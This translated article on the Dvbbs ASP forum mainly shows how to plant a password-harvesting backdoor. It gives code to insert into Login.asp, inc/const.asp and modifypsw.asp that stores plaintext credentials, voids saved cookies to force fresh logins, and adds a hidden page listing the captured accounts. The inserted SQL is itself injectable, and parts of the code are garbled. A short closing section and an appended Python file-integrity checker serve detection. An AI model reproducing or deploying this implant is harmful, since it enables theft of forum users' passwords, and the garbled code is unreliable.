Adding a password sniffer to Dvbbs: a vulnerability study of the Dynamic Network forum

Source: Internet
Author: User
Tags: md5, md5 encryption
The Dynamic Network Pioneer Forum (Dvbbs), with its powerful and comprehensive feature set, and free for individual users, is unique among the many forum packages on the network, and many people make it their first choice. In the new version of the forum, however, user passwords are stored with irreversible MD5 encryption: even the administrator cannot look up a user's password, and the database yields only the encrypted result.

First, the login process. The user enters an account name and password; the password is passed through the MD5 function, and the result is compared with the value stored in the database. If they are the same, the login succeeds and the user's personal information is saved in a cookie.
Now we will do it ourselves and add a password-recording function to the forum.

Look at the source of Login.asp, the file that logs the user into the system. Validation is a direct call to the Chklogin() function. Following Chklogin(), you can see that the first statement checks whether the user filled in everything, and the next one is:
PASSWORD=MD5(CHECKSTR(Request("password")))
That is the statement: the MD5 function is called to encrypt the password submitted by the user. To record the unencrypted password, our own code has to go in front of this statement. Do not rush to write it yet: since we want to store the password in the database, we first add our own table to the database.
Open the forum's database file. We only need to save two items in this table, the username and the password, so choose "Create table using designer", enter the field names User and pass with data type Text, then save the table under the name Hacker.

Now we can use SQL commands in the ASP program to add the username and password to the table we just created. Add the following code in front of the statement above:
' First query the database to see if the user's password has been logged to avoid repeated additions
Set Rs=conn.execute ("Select User from Hacker where user=" &request ("username") & "")
If rs.eof and Rs.bof then
' If not, insert the username and password into the table we just created
Sql= "INSERT INTO hacker (User,pass) VALUES (" &request ("username") & "," &request ("password") & ")"
Conn.execute (SQL)
Rs.close
Else
End If
With the code above, every time a user logs in, the username and password are automatically added to the Hacker table we created.
However, the Dynamic Network forum also has a feature that saves the login information in a cookie for one day, one month or one year, so that the user does not have to enter the account on every visit. We do not want these users' passwords to be missed, so we have to find a way to force them to log in again through our modified file.
The forum's cookie check code is in the file \inc\const.asp; open it and view the source:
Membername=checkstr (Request.Cookies ("Aspsky") ("username"))
Memberclass=checkstr (Request.Cookies ("Aspsky") ("UserClass"))
Memberword=checkstr (Request.Cookies ("Aspsky") ("password"))
These three statements check the information stored in the user's cookie; changing any one of the variables invalidates the login. I added the following code after the second statement:
' Check if the user's account has been logged, if not, modify its password variable for user name
Set Rs=conn.execute ("Select User from Hacker where user=" &membername& ")
If rs.eof and Rs.bof then
Memberword=checkstr (Request.Cookies ("Aspsky") ("username"))
Rs.close
Else
' If it has been recorded, the cookie verifies that everything is OK, so that the user will not be suspected of being completely invalidated by the cookie.
Memberword=checkstr (Request.Cookies ("Aspsky") ("password"))
End If
The account-recording code is now basically finished: as soon as a user logs in, the account goes straight into our database. But we have missed one point: if the user changes the password, the password we recorded is out of date, and our recording program has no way to tell that the password was changed. So we continue by modifying the password-change program, modifypsw.asp:
RS("UserPassword")=password
RS("quesion")=quesion
RS("answer")=answer
Rs.Update
The code above updates the password. Consider: only a logged-in user can change the password, and since the user has logged in, our database must already hold that password, so whatever the password is changed to, we only need to update our database. Add the following two statements after the four lines above:
' Note: we do not use the variable password here, because it holds the MD5 encryption result
sql = "Update hacker set pass=" &request ("PSW") & "where user=" &membername& ""
Conn.execute (SQL)
Finally, we cannot open the database every time we want to look up a user's password, so we also write an ASP program that queries the passwords through a web interface.
Below is my own ASP code, which borrows a function that the Dynamic Network forum uses for fuzzy queries. You can search by username directly to get the account, or show all recorded accounts.

<!--#include file= "conn.asp"-->
<!--#include file= "inc/const.asp"-->
<%
' The translate() function that the Dynamic Network forum uses for fuzzy queries
Public function translate (SOURCESTR,FIELDSTR)
  dim SourceList
  dim ResultStr
  dim I,j
  if InStr (Sourcestr, "") >0 Then
    dim Isoperator
    isoperator = True
    sourcelist=split (SOURCESTR)
    --------------------------------------------------------
    rem Response.Write "num:" & CStr (UBound (sourceList)) & "<br>"
    for i = 0 To UBound (sourceList)
      rem Response.Write I
      Select Case UCase (sourceList (i))
      Case "and", "&", "and", "and"
        resultstr=resultstr & "and"
        isoperator = True
      Case "or", "|", "or"
        resultstr=resultstr & "or"
        isoperator = True
      Case ' not ', '! ', ' non ', '! ","! "
        resultstr=resultstr & "not"
        isoperator = True
      Case "(", "(", ") ("
        resultstr=resultstr & "("
        isoperator = True
      Case ")", ")", "") "
        resultstr=resultstr & ")"
        isoperator = True
      Case Else
        if sourceList (i) <> "" Then
          if not Isoperator then Resultstr=resultstr & "and"
          if inStr (sourceList (i), "%") > 0 Then
            resultstr=resultstr& "" &fieldStr& "Like" & Replace (SourceList (i), "", "") & ""
          else
            resultstr=resultstr& "" &fieldStr& "like%" & Replace (SourceList (i), "" "," ") &"% "
          end if
          isoperator=false
        End If
      End Select
      rem Response.Write resultstr+ "<br>"
    next
    translate=resultstr
  else ' single condition
    if inStr (sourcestr, "%") > 0 Then
      translate= "" & Fieldstr & "like" & Replace (Sourcestr, "", "") & ""
    else
      translate= "" & fieldstr & "Like%" & Replace (Sourcestr, "", "") & "%"
    End If
  end if
End Function
%>
<%

' Check if a fuzzy query is used, and if so, query the database
If Request.Form ("id") <> "" then
Dim key
Key = Request.Form ("id")
Set Rs=conn.execute ("Select User,pass from Hacker where (" & Translate (Key, "user") & ")"
' Check if all accounts are queried, and if so, all records are queried
else if request.querystring ("id") <> "all" then
Else
Set Rs=conn.execute ("SELECT * FROM Hacker")
End If
End If

%>

<div align= "center" >
  <p><strong>Query Password</strong></p>
  <form name="Form1" method="Post" action="">
    User name:
    <input name= "id" type= "text" size= ">"
    <input type="Submit" name="submit" value="Search">
  </form>
  <p><a href="Test.asp?id=all">Show All</a></p>
  <table width= "border=" 1 "cellspacing=" 0 "cellpadding=" 0 ">
<%
' Check whether an account was queried; if not, display "please select the query method", otherwise display the result
If Request.QueryString("id") <> "" or Request.Form("id") <> "" Then%><tr>
      <td width= "><div" align= "center" >Username</div></td>
      <td width= "><div" align= "center" >Password</div></td>
    </tr>
<% Do while (not rs.eof)%><tr>
      <td><%=rs("user")%></td>
      <td><%=rs("Pass")%></td>
    </tr>
  <% Rs.MoveNext
  Loop
  Rs.close
  else
  response.write("<tr><td><center>select query mode</center></td></tr>")
  end if
  %>
  </table>
</div>

Some other thoughts:
If the server is compromised, we also have to prevent the forum from being modified into someone else's password-harvesting tool, so we have to consider the hacker's usual methods.
First is the database. We need to be able to check at any time whether the database is intact, and respond promptly if it is not. A popular trick on the network now is to change the database's file extension to .asp and add a table to it that cannot be deleted, which effectively prevents the database from being downloaded by others. Turned around, a hacker is likely to change the extension of his own database file to .asp and hide it among the site's large number of files, which an inexperienced administrator will find hard to spot. So check the whole site's files regularly: an ASP file that has appeared for no reason is very likely a black hand behind the scenes.
Hackers can do more than drop in their own ASP files; a clever hacker will also hide their code inside existing ASP files. A browser can pass querystring variables to an ASP file, and if a condition such as if Query.string("variable") = "" Then ... is placed in the ASP, this simple method can be said to be almost impossible to notice. Because the database is so convenient, the average administrator rarely thinks to check whether the files on the server have been modified, so it is very necessary to check regularly whether files have been modified.
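The checks suggested here (a baseline of the site's files, a look for ASP files that appeared without explanation, and a look for database files hidden under an .asp extension) can be automated. The following Python script is an added example and is not part of the original article or of Dvbbs. It builds a constructed mini web root in a temporary directory, records a SHA-256 baseline, simulates tampering, and reports added, removed and modified files; it also flags new .asp files whose bytes carry the Access Jet database header, which is how a renamed .mdb file is recognised whatever its name. The file names and contents in demo() are constructed for the demonstration.

```python
import hashlib
import tempfile
from pathlib import Path

# Offset 4 of an Access (Jet 3/4) .mdb file carries this 15-byte signature.
JET_SIGNATURE = b"Standard Jet DB"


def hash_file(path: Path) -> str:
    """SHA-256 of a file, read in chunks so large uploads are not loaded into memory."""
    digest = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot(root: Path) -> dict:
    """Map every file under root (relative path, '/' separators) to its digest."""
    return {
        p.relative_to(root).as_posix(): hash_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def diff_snapshots(baseline: dict, current: dict) -> dict:
    """Report files added, removed or changed since the baseline was taken."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }


def looks_like_jet_db(path: Path) -> bool:
    """True if the file carries the Access database header, regardless of its extension."""
    with path.open("rb") as f:
        header = f.read(20)
    return header[4:19] == JET_SIGNATURE


def classify_new_asp(root: Path, baseline: dict, current: dict) -> dict:
    """For each .asp file absent from the baseline, say whether it is script or a renamed Access DB."""
    result = {}
    for rel in current:
        if rel.lower().endswith(".asp") and rel not in baseline:
            result[rel] = "access-db" if looks_like_jet_db(root / rel) else "script"
    return result


def demo() -> dict:
    """Build a constructed mini web root, take a baseline, tamper with it, and report the differences."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "inc").mkdir()
        (root / "data").mkdir()
        # Constructed sample site: two script files plus the admin's own database renamed to .asp
        (root / "login.asp").write_text("<% ' login page %>")
        (root / "inc" / "const.asp").write_text("<% ' cookie check %>")
        (root / "data" / "dvbbs.asp").write_bytes(b"\x00\x01\x00\x00" + JET_SIGNATURE + b"\x00")
        baseline = snapshot(root)

        # Simulated tampering: one script edited, one new script, one foreign DB hidden as .asp
        (root / "login.asp").write_text("<% ' login page, edited %>")
        (root / "test.asp").write_text("<% ' new query page %>")
        (root / "hidden.asp").write_bytes(b"\x00\x01\x00\x00" + JET_SIGNATURE + b"\x00")
        current = snapshot(root)

        report = diff_snapshots(baseline, current)
        report["new_asp"] = classify_new_asp(root, baseline, current)
        return report


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

In practice, take the baseline right after deploying a known-good copy of the forum, keep it off the web server, and run the comparison on a schedule; an entry under "modified" for Login.asp, inc/const.asp or modifypsw.asp is exactly the kind of change described above, and a new .asp classified as "access-db" is a database file somebody has hidden under the script extension.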
